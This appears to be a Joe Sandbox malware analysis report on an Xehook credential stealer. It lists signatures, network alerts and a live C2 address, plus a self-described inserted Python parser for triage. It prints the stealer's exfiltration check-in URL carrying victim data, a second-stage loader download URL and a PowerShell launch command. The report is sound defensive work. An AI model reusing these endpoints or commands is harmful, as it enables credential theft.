
Windows Analysis Report
1d0000.MSBuild.exe

Overview

General Information

Sample name: 1d0000.MSBuild.exe
Analysis ID: 1504858
MD5: 41cf033d05ae0e2c5238a7932cf2dc77
SHA1: df885092f397a0a70f26b98c5abb35253d2cb06c
SHA256: f307cd4cb26d2d851ca55e9ab039656247ffd3b01b89ad0dcd32adf8e689724b
Tags: exe, xehook, stealer

Detection

Xehook Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected Xehook Stealer
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 1d0000.MSBuild.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\1d0000.MSBuild.exe" MD5: 41CF033D05AE0E2C5238A7932CF2DC77)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author
1d0000.MSBuild.exe | JoeSecurity_xehookStealer_1 | Yara detected Xehook Stealer | Joe Security
00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_xehookStealer_1 | Yara detected Xehook Stealer | Joe Security
00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_xehookStealer_1 | Yara detected Xehook Stealer | Joe Security
Process Memory Space: 1d0000.MSBuild.exe PID: 7416 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 1d0000.MSBuild.exe PID: 7416 | JoeSecurity_xehookStealer_1 | Yara detected Xehook Stealer | Joe Security
0.0.1d0000.MSBuild.exe.1c2541e0000.0.unpack | JoeSecurity_xehookStealer_1 | Yara detected Xehook Stealer | Joe Security
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1d0000.MSBuild.exe", ParentImage: C:\Users\user\Desktop\1d0000.MSBuild.exe, ParentProcessId: 7416, ParentProcessName: 1d0000.MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'", ProcessId: 7660, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T14:29:13.959077+0200 | 2051457 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 65.109.218.88 | 80 | TCP
2024-09-05T14:29:14.649122+0200 | 2051458 | 1 | A Network Trojan was detected | 65.109.218.88 | 80 | 192.168.2.8 | 49706 | TCP
2024-09-05T14:29:13.959077+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 65.109.218.88 | 80 | TCP
2024-09-05T14:29:20.601787+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 87.250.250.50 | 443 | TCP
2024-09-05T14:29:17.912548+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 65.109.218.88 | 80 | TCP
2024-09-05T14:29:18.305457+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 65.109.218.88 | 80 | TCP
2024-09-05T14:29:16.248275+0200 | 2843856 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 65.109.218.88 | 80 | TCP


AV Detection

Source: 1d0000.MSBuild.exe | Avira: detected
Source: http://65.109.218.88 | Avira URL Cloud: Label: malware
Source: http://65.109.218.88/ | Avira URL Cloud: Label: malware
Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect= | Avira URL Cloud: Label: malware
Source: http://65.109.218.88/getloader.php?id=208 | Avira URL Cloud: Label: malware
Source: http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8. | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 1d0000.MSBuild.exe | Joe Sandbox ML: detected
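The xh.php request flagged by Avira URL Cloud above carries the whole check-in as query parameters: build id, a token, the victim's public IP, country, user and host names, and per-category loot counters. The parser below, added here as an example and not Joe Sandbox's or the stealer's own code, turns that URL into a triage record and separately tags the getloader.php second-stage fetch. The input list is constructed from the two URLs recorded in this report plus one invented non-match; reading `passwords`, `cookies`, `wallets`, `cardsc`, `ext` and `filters` as counts and `telegram`/`discord`/`steam` as booleans is an interpretation of the observed values, not a documented protocol.

```python
"""Parse Xehook check-in URLs (as recorded in this report) into triage records.

Example code added to this Joe Sandbox report; field semantics are inferred from the
observed query string and are assumptions, not documented behaviour of the stealer."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

CHECKIN_PATH = "/xh.php"          # observed in the report
LOADER_PATH = "/getloader.php"    # observed in the report
TOKEN_PREFIX = "xehook"           # observed prefix of the token parameter

COUNT_FIELDS = ("passwords", "cookies", "wallets", "cardsc", "ext", "filters")
FLAG_FIELDS = ("telegram", "discord", "steam")


@dataclass
class XehookCheckin:
    c2: str
    build_id: str
    build: str
    token: str
    victim_ip: str
    country: str
    username: str
    pcname: str
    counts: Dict[str, int] = field(default_factory=dict)
    flags: Dict[str, bool] = field(default_factory=dict)

    @property
    def loot_total(self) -> int:
        """Sum of all harvested-item counters reported in the beacon."""
        return sum(self.counts.values())


def _first(qs: Dict[str, List[str]], key: str, default: str = "") -> str:
    return qs.get(key, [default])[0]


def _count(qs: Dict[str, List[str]], key: str) -> int:
    value = _first(qs, key, "0")
    return int(value) if value.isdigit() else 0


def parse_checkin(url: str) -> Optional[XehookCheckin]:
    """Return a XehookCheckin for an /xh.php beacon carrying an 'xehook' token, else None."""
    parts = urlsplit(url)
    if parts.path != CHECKIN_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # keep 'domaindetect=' visible
    token = _first(qs, "token")
    if not token.startswith(TOKEN_PREFIX):
        return None
    return XehookCheckin(
        c2=parts.netloc,
        build_id=_first(qs, "id"),
        build=_first(qs, "build"),
        token=token,
        victim_ip=_first(qs, "ip"),
        country=_first(qs, "country"),
        username=_first(qs, "username"),
        pcname=_first(qs, "pcname"),
        counts={k: _count(qs, k) for k in COUNT_FIELDS},
        flags={k: _first(qs, k, "False").lower() == "true" for k in FLAG_FIELDS},
    )


def is_loader_request(url: str) -> bool:
    """True for the second-stage fetch: /getloader.php with a build id."""
    parts = urlsplit(url)
    return parts.path == LOADER_PATH and "id" in parse_qs(parts.query)


def triage(urls: List[str]) -> Dict[str, object]:
    """Group a batch of URLs into check-ins, loader fetches and the C2 hosts seen."""
    checkins = [c for c in map(parse_checkin, urls) if c]
    return {
        "checkins": checkins,
        "loader_requests": [u for u in urls if is_loader_request(u)],
        "c2_hosts": sorted({c.c2 for c in checkins}),
    }


# Constructed input: the two requests recorded in this report plus one invented non-match.
SAMPLE_URLS = [
    "http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user"
    "&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0"
    "&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0"
    "&telegram=False&discord=False&steam=False&domaindetect=",
    "http://65.109.218.88/getloader.php?id=208",
    "http://example.invalid/xh.php?id=1&token=notxehook",  # same path, wrong token: ignored
]

if __name__ == "__main__":
    for checkin in triage(SAMPLE_URLS)["checkins"]:
        print(checkin.c2, checkin.build_id, checkin.victim_ip, checkin.loot_total)
```

The zero counters here reflect an empty sandbox VM (only two cookies were found), so `loot_total` says nothing about what the stealer would take from a real host; on an actual incident those fields set the priority for credential and session rotation. The `getloader.php?id=208` fetch is the second-stage download, and the signature "Creates HTML files with .exe extension (expired dropper behavior)" listed above is consistent with that request having returned a web page rather than a binary at analysis time.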
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe | Code function: 0_2_00007FFB4AE25D62 CryptUnprotectData, 0_2_00007FFB4AE25D62
Source: unknown | HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49713 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: 1d0000.MSBuild.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking